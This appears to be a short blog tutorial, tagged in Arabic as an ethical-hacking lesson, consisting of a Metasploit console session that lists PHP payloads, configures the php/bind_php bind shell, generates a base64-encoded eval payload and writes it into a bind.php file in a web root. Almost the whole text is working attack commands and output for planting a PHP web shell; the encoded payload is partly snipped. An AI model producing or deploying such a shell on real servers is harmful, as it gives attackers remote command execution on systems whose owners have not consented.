metasploit php shell

1.                                   _
2.                                  | |      o
3.  _  _  _    _ _|_  __,   ,    _  | |  __    _|_
4. / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
5.   |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
6.                            /|
7.                            \|
10.        =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
11. + -- --=[ 644 exploits - 328 auxiliary
12. + -- --=[ 216 payloads - 27 encoders - 8 nops
13.        =[ svn r11722 updated 4 days ago (2011.02.08)
15. msf > search php
16. [*] Searching loaded modules for pattern 'php'...
17. <--BIG SNIP-->
18. NOP Generators
19. ==============
21.    Name         Disclosure Date  Rank    Description
22.    ----         ---------------  ----    -----------
23.    php/generic                   normal  PHP Nop Generator
26. Payloads
27. ========
29.    Name                         Disclosure Date  Rank    Description
30.    ----                         ---------------  ----    -----------
31.    php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
32.    php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
33.    php/download_exec                             normal  PHP Executable Download and Execute
34.    php/exec                                      normal  PHP Execute Command
35.    php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
36.    php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
37.    php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
38.    php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
39.    php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
40.    php/shell_findsock                            normal  PHP Command Shell, Find Sock
42. msf > use php/bind_php
43. msf payload(bind_php) > show options
45. Module options (payload/php/bind_php):
47.    Name   Current Setting  Required  Description
48.    ----   ---------------  --------  -----------
49.    LPORT  4444             yes       The listen port
50.    RHOST                   no        The target address
52. msf payload(bind_php) > set RHOST 192.168.1.5
53. RHOST => 192.168.1.5
54. msf payload(bind_php) > set LPORT 4321
55. LPORT => 4321
56. msf payload(bind_php) > generate -h
57. Usage: generate [options]
59. Generates a payload.
61. OPTIONS:
63.     -E        Force encoding.
64.     -b <opt>  The list of characters to avoid: '\x00\xff'
65.     -e <opt>  The name of the encoder module to use.
66.     -f <opt>  The output file name (otherwise stdout)
67.     -h        Help banner.
68.     -i <opt>  the number of encoding iterations.
69.     -k        Keep the template executable functional
70.     -o <opt>  A comma separated list of options in VAR=VAL format.
71.     -p <opt>  The Platform for output.
72.     -s <opt>  NOP sled length.
73.     -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
74.     -x <opt>  The executable template to use
76. msf payload(bind_php) > generate -t raw -e php/base64
77. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
78. msf payload(bind_php) > exit
80. root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php
    
    
    sec-worldweb.blogspot.com

تصنيف : دروس و شروحات,هاكر أخلاقي